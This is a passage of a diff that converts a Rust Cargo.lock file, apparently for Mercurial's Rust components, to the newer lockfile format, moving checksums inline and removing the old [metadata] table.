"derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", - "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)", - "format-bytes 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)", - "hg-core 0.1.0", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", - "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", - "users 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)", + "chrono", + "clap", + "derive_more", + "env_logger", + "format-bytes", + "hg-core", + "log", + "micro-timer", + "users", ] [[package]] name = "rust-crypto" version = "0.2.36" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f76d05d3993fd5f4af9434e8e436db163a12a9d40e1a58a726f27a01dfd12a2a" dependencies = [ - "gcc 0.3.55 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.3.23 (registry+https://github.com/rust-lang/crates.io-index)", - "rustc-serialize 0.3.24 (registry+https://github.com/rust-lang/crates.io-index)", - "time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)", + "gcc", + "libc", + "rand 0.3.23", + "rustc-serialize", + "time", ] [[package]] name = "rustc-serialize" version = "0.3.24" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dcf128d1287d2ea9d80910b5f1120d0b8eede3fbf1abe91c40d39ea7d51e6fda" [[package]] name = "same-file" version = "1.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502" dependencies = [ - "winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi-util", ] [[package]] name = "scopeguard" version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd" [[package]] name = "sized-chunks" version = "0.6.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1ec31ceca5644fa6d444cc77548b88b67f46db6f7c71683b0f9336e671830d2f" dependencies = [ - "bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)", + "bitmaps", + "typenum", ] [[package]] name = "static_assertions" version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f" [[package]] name = "strsim" version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8ea5119cdb4c55b55d432abb513a0429384878c15dde60cc77b1c99de1a95a6a" [[package]] name = "syn" version = "1.0.54" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9a2af957a63d6bd42255c359c93d9bfdb97076bd3b820897ce55ffbfbf107f44" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", + "quote", + "unicode-xid", ] [[package]] name = "tempfile" version = "3.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7a6e24d9338a0a5be79593e2fa15a648add6138caa803e2d5bc782c371732ca9" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)", - "redox_syscall 0.1.57 (registry+https://github.com/rust-lang/crates.io-index)", - "remove_dir_all 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", + "libc", + "rand 0.7.3", + "redox_syscall", + "remove_dir_all", + "winapi", ] [[package]] name = "termcolor" version = "1.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2dfed899f0eb03f32ee8c6a0aabdb8a7949659e3466561fc0adf54e26d88c5f4" dependencies = [ - "winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi-util", ] [[package]] name = "textwrap" version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d326610f408c7a4eb6f51c37c330e496b08506c9457c9d34287ecc38809fb060" dependencies = [ - "unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)", + "unicode-width", ] [[package]] name = "thread_local" version = "1.0.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d40c6d1b69745a6ec6fb1ca717914848da4b44ae29d9b3080cbee91d72a69b14" dependencies = [ - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "lazy_static", ] [[package]] name = "time" version = "0.1.44" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "wasi 0.10.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "wasi 0.10.0+wasi-snapshot-preview1", + "winapi", ] [[package]] name = "twox-hash" version = "1.6.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "04f8ab788026715fa63b31960869617cba39117e520eb415b0139543e325ab59" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)", - "static_assertions 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", + "rand 0.7.3", + "static_assertions", ] [[package]] name = "typenum" version = "1.12.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "373c8a200f9e67a0c95e62a4f52fbf80c23b4381c05a17845531982fa99e6b33" [[package]] name = "unicode-width" version = "0.1.8" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3" [[package]] name = "unicode-xid" version = "0.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f7fe0bb3479651439c9112f72b6c505038574c9fbb575ed1bf3b797fa39dd564" [[package]] name = "users" version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "24cc0f6d6f267b73e5a2cadf007ba8f9bc39c6a6f9666f8cf25ea809a153b032" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "log", ] [[package]] name = "vcpkg" version = "0.2.11" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b00bca6106a5e23f3eee943593759b7fcddb00554332e856d990c893966879fb" [[package]] name = "vec_map" version = "0.8.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191" [[package]] name = "version_check" version = "0.9.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b5a972e5669d67ba988ce3dc826706fb0a8b01471c088cb0b6110b805cc36aed" [[package]] name = "wasi" version = "0.9.0+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519" [[package]] name = "wasi" version = "0.10.0+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f" [[package]] name = "winapi" version = "0.3.9" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" dependencies = [ - "winapi-i686-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi-x86_64-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi-i686-pc-windows-gnu", + "winapi-x86_64-pc-windows-gnu", ] [[package]] name = "winapi-i686-pc-windows-gnu" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" [[package]] name = "winapi-util" version = "0.1.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "70ec6ce85bb158151cae5e5c87f95a8e97d2c0c4b001223f33a334e3ce5de178" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "winapi-x86_64-pc-windows-gnu" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" [[package]] name = "zstd" version = "0.5.3+zstd.1.4.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "01b32eaf771efa709e8308605bbf9319bf485dc1503179ec0469b611937c0cd8" dependencies = [ - "zstd-safe 2.0.5+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)", + "zstd-safe", ] [[package]] name = "zstd-safe" version = "2.0.5+zstd.1.4.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1cfb642e0d27f64729a639c52db457e0ae906e7bc6f5fe8f5c453230400f1055" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "zstd-sys 1.4.17+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "zstd-sys", ] [[package]] name = "zstd-sys" version = "1.4.17+zstd.1.4.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b89249644df056b522696b1bb9e7c18c87e8ffa3e2f0dc3b0155875d6498f01b" dependencies = [ - "cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)", - "glob 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)", - "itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "cc", + "glob", + "itertools", + "libc", ] - -[metadata] -"checksum adler 0.2.3 (registry+https://github.com/rust-lang/crates.io-index)" = "ee2a4ec343196209d6594e19543ae87a39f96d5534d7174822a3ad825dd6ed7e" -"checksum aho-corasick 0.7.15 (registry+https://github.com/rust-lang/crates.io-index)" = "7404febffaa47dac81aa44dba71523c9d069b1bdc50a77db41195149e17f68e5" -"checksum ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ee49baf6cb617b853aa8d93bf420db2383fab46d314482ca2803b40d5fde979b" -"checksum atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)" = "d9b39be18770d11421cdb1b9947a45dd3f37e93092cbf377614828a319d5fee8" -"checksum autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)" = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a" -"checksum bitflags 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "cf1de2fe8c75bc145a2f577add951f8134889b4795d47466a54a5c846d691693" -"checksum bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "031043d04099746d8db04daf1fa424b2bc8bd69d92b25962dcde24da39ab64a2" -"checksum byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)" = "08c48aae112d48ed9f069b33538ea9e3e90aa263cfa3d1c24309612b1f7472de" -"checksum bytes-cast 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "3196ba300c7bc9282a4331e878496cb3e9603a898a8f1446601317163e16ca52" -"checksum bytes-cast-derive 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "cb936af9de38476664d6b58e529aff30d482e4ce1c5e150293d00730b0d81fdb" -"checksum cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)" = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48" -"checksum cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)" = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822" -"checksum cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" -"checksum chrono 0.4.19 (registry+https://github.com/rust-lang/crates.io-index)" = "670ad68c9088c2a963aaa298cb369688cf3f9465ce5e2d4ca10e6e0098a1ce73" -"checksum clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)" = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002" -"checksum const_fn 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)" = "cd51eab21ab4fd6a3bf889e2d0958c0a6e3a61ad04260325e919e652a2a62826" -"checksum cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "bfaf3847ab963e40c4f6dd8d6be279bdf74007ae2413786a0dcbb28c52139a95" -"checksum crc32fast 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "81156fece84ab6a9f2afdb109ce3ae577e42b1228441eded99bd77f627953b1a" -"checksum crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)" = "b153fe7cbef478c567df0f972e02e6d736db11affe43dfc9c56a9374d1adfb87" -"checksum crossbeam-channel 0.5.0 (registry+https://github.com/rust-lang/crates.io-index)" = "dca26ee1f8d361640700bde38b2c37d8c22b3ce2d360e1fc1c74ea4b0aa7d775" -"checksum crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)" = "94af6efb46fef72616855b036a624cf27ba656ffc9be1b9a3c931cfc7749a9a9" -"checksum crossbeam-epoch 0.9.1 (registry+https://github.com/rust-lang/crates.io-index)" = "a1aaa739f95311c2c7887a76863f500026092fb1dce0161dab577e559ef3569d" -"checksum crossbeam-utils 0.7.2 (registry+https://github.com/rust-lang/crates.io-index)" = "c3c7c73a2d1e9fc0886a08b93e98eb643461230d5f1925e4036204d5f2e261a8" -"checksum crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)" = "02d96d1e189ef58269ebe5b97953da3274d83a93af647c2ddd6f9dab28cedb8d" -"checksum ctor 0.1.16 (registry+https://github.com/rust-lang/crates.io-index)" = "7fbaabec2c953050352311293be5c6aba8e141ba19d6811862b232d6fd020484" -"checksum derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)" = "41cb0e6161ad61ed084a36ba71fbba9e3ac5aee3606fb607fe08da6acbcf3d8c" -"checksum difference 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "524cbf6897b527295dff137cec09ecf3a05f4fddffd7dfcd1585403449e74198" -"checksum either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457" -"checksum env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)" = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36" -"checksum flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)" = "7411863d55df97a419aa64cb4d2f167103ea9d767e2c54a1868b7ac3f6b47129" -"checksum format-bytes 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)" = "cc35f5e45d6b31053cea13078ffc6fa52fa8617aa54b7ac2011720d9c009e04f" -"checksum format-bytes-macros 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "b05089e341a0460449e2210c3bf7b61597860b07f0deae58da38dbed0a4c6b6d" -"checksum fuchsia-cprng 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)" = "a06f77d526c1a601b7c4cdd98f54b5eaabffc14d5f2f0296febdc7f357c6d3ba" -"checksum gcc 0.3.55 (registry+https://github.com/rust-lang/crates.io-index)" = "8f5f3913fa0bfe7ee1fd8248b6b9f42a5af4b9d65ec2dd2c3c26132b950ecfc2" -"checksum getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)" = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6" -"checksum glob 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574" -"checksum hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)" = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8" -"checksum home 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)" = "2456aef2e6b6a9784192ae780c0f15bc57df0e918585282325e8c8ac27737654" -"checksum humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f" -"checksum im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f" -"checksum itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b" -"checksum jobserver 0.1.21 (registry+https://github.com/rust-lang/crates.io-index)" = "5c71313ebb9439f74b00d9d2dcec36440beaf57a6aa0623068441dd7cd81a7f2" -"checksum lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646" -"checksum libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)" = "1482821306169ec4d07f6aca392a4681f66c75c9918aa49641a2595db64053cb" -"checksum libz-sys 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "602113192b08db8f38796c4e85c39e960c145965140e918018bcde1952429655" -"checksum log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)" = "4fabed175da42fed1fa0746b0ea71f412aa9d35e76e95e59b192c64b9dc2bf8b" -"checksum maybe-uninit 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "60302e4db3a61da70c0cb7991976248362f30319e88850c487b9b95bbf059e00" -"checksum memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)" = "0ee1c47aaa256ecabcaea351eae4a9b01ef39ed810004e298d2511ed284b1525" -"checksum memmap 0.7.0 (registry+https://github.com/rust-lang/crates.io-index)" = "6585fd95e7bb50d6cc31e20d4cf9afb4e2ba16c5846fc76793f11218da9c475b" -"checksum memoffset 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "157b4208e3059a8f9e78d559edc658e13df41410cb3ae03979c83130067fdd87" -"checksum micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "2620153e1d903d26b72b89f0e9c48d8c4756cba941c185461dddc234980c298c" -"checksum micro-timer-macros 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e28a3473e6abd6e9aab36aaeef32ad22ae0bd34e79f376643594c2b152ec1c5d" -"checksum miniz_oxide 0.4.3 (registry+https://github.com/rust-lang/crates.io-index)" = "0f2d26ec3309788e423cfbf68ad1800f061638098d76a83681af979dc4eda19d" -"checksum num-integer 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)" = "d2cc698a63b549a70bc047073d2949cce27cd1c7b0a4a862d08a8031bc2801db" -"checksum num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)" = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290" -"checksum num_cpus 1.13.0 (registry+https://github.com/rust-lang/crates.io-index)" = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3" -"checksum output_vt100 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "53cdc5b785b7a58c5aad8216b3dfa114df64b0b06ae6e1501cef91df2fbdf8f9" -"checksum pkg-config 0.3.19 (registry+https://github.com/rust-lang/crates.io-index)" = "3831453b3449ceb48b6d9c7ad7c96d5ea673e9b470a1dc578c2ce6521230884c" -"checksum ppv-lite86 0.2.10 (registry+https://github.com/rust-lang/crates.io-index)" = "ac74c624d6b2d21f425f752262f42188365d7b8ff1aff74c82e45136510a4857" -"checksum pretty_assertions 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "3f81e1644e1b54f5a68959a29aa86cde704219254669da328ecfdf6a1f09d427" -"checksum proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)" = "dbf0c48bc1d91375ae5c3cd81e3722dff1abcf81a30960240640d223f59fe0e5" -"checksum proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)" = "1e0704ee1a7e00d7bb417d0770ea303c1bccbabf0ef1667dae92b5967f5f8a71" -"checksum python27-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "67cb041de8615111bf224dd75667af5f25c6e032118251426fed7f1b70ce4c8c" -"checksum python3-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "90af11779515a1e530af60782d273b59ac79d33b0e253c071a728563957c76d4" -"checksum quick-error 1.2.3 (registry+https://github.com/rust-lang/crates.io-index)" = "a1d01941d82fa2ab50be1e79e6714289dd7cde78eba4c074bc5a4374f650dfe0" -"checksum quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)" = "aa563d17ecb180e500da1cfd2b028310ac758de548efdd203e18f283af693f37" -"checksum rand 0.3.23 (registry+https://github.com/rust-lang/crates.io-index)" = "64ac302d8f83c0c1974bf758f6b041c6c8ada916fbb44a609158ca8b064cc76c" -"checksum rand 0.4.6 (registry+https://github.com/rust-lang/crates.io-index)" = "552840b97013b1a26992c11eac34bdd778e464601a4c2054b5f0bff7c6761293" -"checksum rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)" = "6a6b1679d49b24bbfe0c803429aa1874472f50d9b363131f0e89fc356b544d03" -"checksum rand_chacha 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f4c8ed856279c9737206bf725bf36935d8666ead7aa69b52be55af369d193402" -"checksum rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "7a6fdeb83b075e8266dcc8762c22776f6877a63111121f5f8c7411e5be7eed4b" -"checksum rand_core 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "9c33a3c44ca05fa6f1807d8e6743f3824e8509beca625669633be0acbdf509dc" -"checksum rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)" = "90bde5296fc891b0cef12a6d03ddccc162ce7b2aff54160af9338f8d40df6d19" -"checksum rand_distr 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)" = "96977acbdd3a6576fb1d27391900035bf3863d4a16422973a409b488cf29ffb2" -"checksum rand_hc 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ca3129af7b92a17112d59ad498c6f81eaf463253766b90396d39ea7a39d6613c" -"checksum rand_pcg 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "16abd0c1b639e9eb4d7c50c0b8100b0d0f849be2349829c740fe8e6eb4816429" -"checksum rand_xoshiro 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "a9fcdd2e881d02f1d9390ae47ad8e5696a9e4be7b547a1da2afbc61973217004" -"checksum rayon 1.5.0 (registry+https://github.com/rust-lang/crates.io-index)" = "8b0d8e0819fadc20c74ea8373106ead0600e3a67ef1fe8da56e39b9ae7275674" -"checksum rayon-core 1.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "9ab346ac5921dc62ffa9f89b7a773907511cdfa5490c572ae9be1be33e8afa4a" -"checksum rdrand 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "678054eb77286b51581ba43620cc911abf02758c91f93f479767aed0f90458b2" -"checksum redox_syscall 0.1.57 (registry+https://github.com/rust-lang/crates.io-index)" = "41cc0f7e4d5d4544e8861606a285bb08d3e70712ccc7d2b84d7c0ccfaf4b05ce" -"checksum regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "38cf2c13ed4745de91a5eb834e11c00bcc3709e773173b2ce4c56c9fbde04b9c" -"checksum regex-syntax 0.6.21 (registry+https://github.com/rust-lang/crates.io-index)" = "3b181ba2dcf07aaccad5448e8ead58db5b742cf85dfe035e2227f137a539a189" -"checksum remove_dir_all 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)" = "3acd125665422973a33ac9d3dd2df85edad0f4ae9b00dafb1a05e43a9f5ef8e7" -"checksum rust-crypto 0.2.36 (registry+https://github.com/rust-lang/crates.io-index)" = "f76d05d3993fd5f4af9434e8e436db163a12a9d40e1a58a726f27a01dfd12a2a" -"checksum rustc-serialize 0.3.24 (registry+https://github.com/rust-lang/crates.io-index)" = "dcf128d1287d2ea9d80910b5f1120d0b8eede3fbf1abe91c40d39ea7d51e6fda" -"checksum same-file 1.0.6 (registry+https://github.com/rust-lang/crates.io-index)" = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502" -"checksum scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd" -"checksum sized-chunks 0.6.2 (registry+https://github.com/rust-lang/crates.io-index)" = "1ec31ceca5644fa6d444cc77548b88b67f46db6f7c71683b0f9336e671830d2f" -"checksum static_assertions 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f" -"checksum strsim 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)" = "8ea5119cdb4c55b55d432abb513a0429384878c15dde60cc77b1c99de1a95a6a" -"checksum syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)" = "9a2af957a63d6bd42255c359c93d9bfdb97076bd3b820897ce55ffbfbf107f44" -"checksum tempfile 3.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "7a6e24d9338a0a5be79593e2fa15a648add6138caa803e2d5bc782c371732ca9" -"checksum termcolor 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "2dfed899f0eb03f32ee8c6a0aabdb8a7949659e3466561fc0adf54e26d88c5f4" -"checksum textwrap 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "d326610f408c7a4eb6f51c37c330e496b08506c9457c9d34287ecc38809fb060" -"checksum thread_local 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)" = "d40c6d1b69745a6ec6fb1ca717914848da4b44ae29d9b3080cbee91d72a69b14" -"checksum time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)" = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255" -"checksum twox-hash 1.6.0 (registry+https://github.com/rust-lang/crates.io-index)" = "04f8ab788026715fa63b31960869617cba39117e520eb415b0139543e325ab59" -"checksum typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)" = "373c8a200f9e67a0c95e62a4f52fbf80c23b4381c05a17845531982fa99e6b33" -"checksum unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)" = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3" -"checksum unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "f7fe0bb3479651439c9112f72b6c505038574c9fbb575ed1bf3b797fa39dd564" -"checksum users 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "24cc0f6d6f267b73e5a2cadf007ba8f9bc39c6a6f9666f8cf25ea809a153b032" -"checksum vcpkg 0.2.11 (registry+https://github.com/rust-lang/crates.io-index)" = "b00bca6106a5e23f3eee943593759b7fcddb00554332e856d990c893966879fb" -"checksum vec_map 0.8.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191" -"checksum version_check 0.9.2 (registry+https://github.com/rust-lang/crates.io-index)" = "b5a972e5669d67ba988ce3dc826706fb0a8b01471c088cb0b6110b805cc36aed" -"checksum wasi 0.10.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)" = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f" -"checksum wasi 0.9.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)" = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519" -"checksum winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)" = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" -"checksum winapi-i686-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" -"checksum winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)" = "70ec6ce85bb158151cae5e5c87f95a8e97d2c0c4b001223f33a334e3ce5de178" -"checksum winapi-x86_64-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" -"checksum zstd 0.5.3+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "01b32eaf771efa709e8308605bbf9319bf485dc1503179ec0469b611937c0cd8" -"checksum zstd-safe 2.0.5+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "1cfb642e0d27f64729a639c52db457e0ae906e7bc6f5fe8f5c453230400f1055" -"checksum zstd-sys 1.4.17+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = 